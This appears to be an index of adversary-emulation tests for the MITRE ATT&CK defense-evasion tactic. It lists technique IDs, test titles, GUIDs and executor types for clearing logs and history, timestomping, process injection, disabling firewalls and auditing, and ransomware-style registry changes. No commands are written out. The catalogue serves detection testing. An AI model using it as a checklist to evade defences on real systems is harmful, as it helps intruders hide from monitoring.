158 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
159 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
160 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 bash
161 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
162 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
163 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Clear Docker Container Logs 553b39f9-1e8c-47b1-abf5-8daf7b0391e9 bash
164 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
165 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
166 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 13 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
167 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 14 Clear PowerShell Session History 22c779cd-9445-4d3e-a136-f75adbf0315f powershell
168 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
169 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
170 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
171 defense-evasion T1202 Indirect Command Execution 4 Indirect Command Execution - Scriptrunner.exe 0fd14730-6226-4f5e-8d67-43c65f1be940 powershell
172 defense-evasion T1202 Indirect Command Execution 5 Indirect Command Execution - RunMRU Dialog de323a93-2f18-4bd5-ba60-d6fca6aeff76 powershell
173 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
174 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
175 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
176 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
177 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
178 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Base64 decoding with shell utilities (freebsd) b6097712-c42e-4174-b8f2-4b1e1a5bbb3d sh
179 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 FreeBSD b64encode Shebang in CLI 18ee2002-66e8-4518-87c5-c0ec9c8299ac sh
180 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
181 defense-evasion T1140 Deobfuscate/Decode Files or Information 9 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
182 defense-evasion T1140 Deobfuscate/Decode Files or Information 10 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
183 defense-evasion T1140 Deobfuscate/Decode Files or Information 11 Expand CAB with expand.exe 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11 command_prompt
184 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
185 defense-evasion T1562 Impair Defenses 2 Disable journal logging via systemctl utility c3a377f9-1203-4454-aa35-9d391d34768f sh
186 defense-evasion T1562 Impair Defenses 3 Disable journal logging via sed utility 12e5551c-8d5c-408e-b3e4-63f53b03379f sh
187 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
188 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
189 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
190 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 1 Copy and Delete Mailbox Data on Windows d29f01ea-ac72-4efc-8a15-bea64b77fabf powershell
191 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 2 Copy and Delete Mailbox Data on Linux 25e2be0e-96f7-4417-bd16-a4a2500e3802 bash
192 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 3 Copy and Delete Mailbox Data on macOS 3824130e-a6e4-4528-8091-3a52eeb540f6 bash
193 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 4 Copy and Modify Mailbox Data on Windows edddff85-fee0-499d-9501-7d4d2892e79b powershell
194 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 5 Copy and Modify Mailbox Data on Linux 6d99f93c-da56-49e3-b195-163090ace4f6 bash
195 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 6 Copy and Modify Mailbox Data on macOS 8a0b1579-5a36-483a-9cde-0236983e1665 bash
196 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
197 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
198 defense-evasion T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
199 defense-evasion T1055 Process Injection 4 Dirty Vanity process Injection 49543237-25db-497b-90df-d0a0a6e8fe2c powershell
200 defense-evasion T1055 Process Injection 5 Read-Write-Execute process Injection 0128e48e-8c1a-433a-a11a-a5387384f1e1 powershell
201 defense-evasion T1055 Process Injection 6 Process Injection with Go using UuidFromStringA WinAPI 2315ce15-38b6-46ac-a3eb-5e21abef2545 powershell
202 defense-evasion T1055 Process Injection 7 Process Injection with Go using EtwpCreateEtwThread WinAPI 7362ecef-6461-402e-8716-7410e1566400 powershell
203 defense-evasion T1055 Process Injection 8 Remote Process Injection with Go using RtlCreateUserThread WinAPI a0c1725f-abcd-40d6-baac-020f3cf94ecd powershell
204 defense-evasion T1055 Process Injection 9 Remote Process Injection with Go using CreateRemoteThread WinAPI 69534efc-d5f5-4550-89e6-12c6457b9edd powershell
205 defense-evasion T1055 Process Injection 10 Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39 powershell
206 defense-evasion T1055 Process Injection 11 Process Injection with Go using CreateThread WinAPI 2871ed59-3837-4a52-9107-99500ebc87cb powershell
207 defense-evasion T1055 Process Injection 12 Process Injection with Go using CreateThread WinAPI (Natively) 2a3c7035-d14f-467a-af94-933e49fe6786 powershell
208 defense-evasion T1055 Process Injection 13 UUID custom process Injection 0128e48e-8c1a-433a-a11a-a5304734f1e1 powershell
209 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
210 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
211 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
212 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
213 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
214 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
215 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
216 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
217 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
218 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
219 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
220 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
221 defense-evasion T1218 Signed Binary Proxy Execution 13 LOLBAS CustomShellHost to Spawn Process b1eeb683-90bb-4365-bbc2-2689015782fe powershell
222 defense-evasion T1218 Signed Binary Proxy Execution 14 Provlaunch.exe Executes Arbitrary Command via Registry Key ab76e34f-28bf-441f-a39c-8db4835b89cc command_prompt
223 defense-evasion T1218 Signed Binary Proxy Execution 15 LOLBAS Msedge to Spawn Process e5eedaed-ad42-4c1e-8783-19529738a349 powershell
224 defense-evasion T1218 Signed Binary Proxy Execution 16 System Binary Proxy Execution - Wlrmdr Lolbin 7816c252-b728-4ea6-a683-bd9441ca0b71 powershell
225 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
226 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
227 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
228 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
229 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
230 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
231 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
232 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
233 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 9 MacOS - Timestomp Date Modified 87fffff4-d371-4057-a539-e3b24c37e564 sh
234 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 10 Event Log Manipulations- Time slipping via Powershell 7bcf83bf-f5ef-425c-9d9a-71618ad9ed12 powershell
235 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
236 defense-evasion T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
237 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
238 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
239 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
240 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Disable Windows IIS HTTP Logging via PowerShell a957fb0f-1e85-49b2-a211-413366784b1e powershell
241 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
242 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
243 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
244 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
245 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 7 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
246 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 8 Modify Event Log Channel Access Permissions via Registry - PowerShell 8e81d090-0cd6-4d46-863c-eec11311298f powershell
247 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 9 Modify Event Log Channel Access Permissions via Registry 2 - PowerShell 85e6eff8-3ed4-4e03-ae50-aa6a404898a5 powershell
248 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 10 Modify Event Log Access Permissions via Registry - PowerShell a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1 powershell
249 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
250 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
251 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
252 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
253 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
254 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
255 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
256 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
257 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start Packet Filter 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7 sh
258 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
259 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
260 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
261 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Add and delete Packet Filter rules 8b23cae1-66c1-41c5-b79d-e095b6098b5b sh
262 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
263 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
264 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
265 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
266 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
267 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 18 Disable iptables 7784c64e-ed0b-4b65-bf63-c86db229fd56 sh
268 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 19 Modify/delete iptables firewall rules 899a7fb5-d197-4951-8614-f19ac4a73ad4 sh
269 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 20 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
270 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 21 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
271 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 22 Blackbit - Disable Windows Firewall using netsh firewall 91f348e6-3760-4997-a93b-2ceee7f254ee command_prompt
272 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 23 ESXi - Disable Firewall via Esxcli bac8a340-be64-4491-a0cc-0985cb227f5a command_prompt
273 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 24 Set a firewall rule using New-NetFirewallRule 94be7646-25f6-467e-af23-585fb13000c8 powershell
274 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 25 ESXi - Set Firewall to PASS Traffic a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d command_prompt
275 defense-evasion T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking 1 SIP (Subject Interface Package) Hijacking via Custom DLL e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675 command_prompt
276 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 1 Delete all auditd rules using auditctl 33a29ab1-cabb-407f-9448-269041bf2856 sh
277 defense-evasion T1562.012 Impair Defenses: Disable or Modify Linux Audit System 2 Disable auditd using auditctl 7906f0a6-b527-46ee-9026-6e81a9184e08 sh
278 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
279 defense-evasion T1553.006 Subvert Trust Controls: Code Signing Policy Modification 1 Code Signing Policy Modification bb6b51e1-ab92-45b5-aeea-e410d06405f8 command_prompt
280 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
281 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
282 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
283 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
284 defense-evasion T1112 Modify Registry 4 Use Powershell to Modify registry to store logon credentials 68254a85-aa42-4312-a695-38b7276307f8 powershell
285 defense-evasion T1112 Modify Registry 5 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
286 defense-evasion T1112 Modify Registry 6 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
287 defense-evasion T1112 Modify Registry 7 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
288 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
289 defense-evasion T1112 Modify Registry 9 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
290 defense-evasion T1112 Modify Registry 10 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
291 defense-evasion T1112 Modify Registry 11 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
292 defense-evasion T1112 Modify Registry 12 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
293 defense-evasion T1112 Modify Registry 13 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
294 defense-evasion T1112 Modify Registry 14 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
295 defense-evasion T1112 Modify Registry 15 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
296 defense-evasion T1112 Modify Registry 16 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
297 defense-evasion T1112 Modify Registry 17 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
298 defense-evasion T1112 Modify Registry 18 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
299 defense-evasion T1112 Modify Registry 19 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
300 defense-evasion T1112 Modify Registry 20 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
301 defense-evasion T1112 Modify Registry 21 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
302 defense-evasion T1112 Modify Registry 22 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
303 defense-evasion T1112 Modify Registry 23 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
304 defense-evasion T1112 Modify Registry 24 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
305 defense-evasion T1112 Modify Registry 25 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
306 defense-evasion T1112 Modify Registry 26 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
307 defense-evasion T1112 Modify Registry 27 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
308 defense-evasion T1112 Modify Registry 28 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
309 defense-evasion T1112 Modify Registry 29 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
310 defense-evasion T1112 Modify Registry 30 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
311 defense-evasion T1112 Modify Registry 31 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
312 defense-evasion T1112 Modify Registry 32 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
313 defense-evasion T1112 Modify Registry 33 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
314 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
315 defense-evasion T1112 Modify Registry 35 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
316 defense-evasion T1112 Modify Registry 36 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
317 defense-evasion T1112 Modify Registry 37 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
318 defense-evasion T1112 Modify Registry 38 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
319 defense-evasion T1112 Modify Registry 39 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
320 defense-evasion T1112 Modify Registry 40 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
321 defense-evasion T1112 Modify Registry 41 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
322 defense-evasion T1112 Modify Registry 42 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
323 defense-evasion T1112 Modify Registry 43 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
324 defense-evasion T1112 Modify Registry 44 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
325 defense-evasion T1112 Modify Registry 45 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
326 defense-evasion T1112 Modify Registry 46 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
327 defense-evasion T1112 Modify Registry 47 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
328 defense-evasion T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
329 defense-evasion T1112 Modify Registry 49 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
330 defense-evasion T1112 Modify Registry 50 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
331 defense-evasion T1112 Modify Registry 51 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
332 defense-evasion T1112 Modify Registry 52 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
333 defense-evasion T1112 Modify Registry 53 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
334 defense-evasion T1112 Modify Registry 54 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
335 defense-evasion T1112 Modify Registry 55 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
336 defense-evasion T1112 Modify Registry 56 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
337 defense-evasion T1112 Modify Registry 57 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
338 defense-evasion T1112 Modify Registry 58 Allow Simultaneous Download Registry 37950714-e923-4f92-8c7c-51e4b6fffbf6 command_prompt
339 defense-evasion T1112 Modify Registry 59 Modify Internet Zone Protocol Defaults in Current User Registry - cmd c88ef166-50fa-40d5-a80c-e2b87d4180f7 command_prompt
340 defense-evasion T1112 Modify Registry 60 Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell b1a4d687-ba52-4057-81ab-757c3dc0d3b5 powershell
341 defense-evasion T1112 Modify Registry 61 Activities To Disable Secondary Authentication Detected By Modified Registry Value. c26fb85a-fa50-4fab-a64a-c51f5dc538d5 command_prompt
342 defense-evasion T1112 Modify Registry 62 Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. ffeddced-bb9f-49c6-97f0-3d07a509bf94 command_prompt
343 defense-evasion T1112 Modify Registry 63 Scarab Ransomware Defense Evasion Activities ca8ba39c-3c5a-459f-8e15-280aec65a910 command_prompt
344 defense-evasion T1112 Modify Registry 64 Disable Remote Desktop Anti-Alias Setting Through Registry 61d35188-f113-4334-8245-8c6556d43909 command_prompt
345 defense-evasion T1112 Modify Registry 65 Disable Remote Desktop Security Settings Through Registry 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 command_prompt
346 defense-evasion T1112 Modify Registry 66 Disabling ShowUI Settings of Windows Error Reporting (WER) 09147b61-40f6-4b2a-b6fb-9e73a3437c96 command_prompt
347 defense-evasion T1112 Modify Registry 67 Enable Proxy Settings eb0ba433-63e5-4a8c-a9f0-27c4192e1336 command_prompt
348 defense-evasion T1112 Modify Registry 68 Set-Up Proxy Server d88a3d3b-d016-4939-a745-03638aafd21b command_prompt
349 defense-evasion T1112 Modify Registry 69 RDP Authentication Level Override 7e7b62e9-5f83-477d-8935-48600f38a3c6 command_prompt
350 defense-evasion T1112 Modify Registry 70 Enable RDP via Registry (fDenyTSConnections) 16bdbe52-371c-4ccf-b708-79fba61f1db4 command_prompt
351 defense-evasion T1112 Modify Registry 71 Disable Windows Prefetch Through Registry 7979dd41-2045-48b2-a54e-b1bc2415c9da command_prompt
352 defense-evasion T1112 Modify Registry 72 Setting Shadow key in Registry for RDP Shadowing ac494fe5-81a4-4897-af42-e774cf005ecb powershell
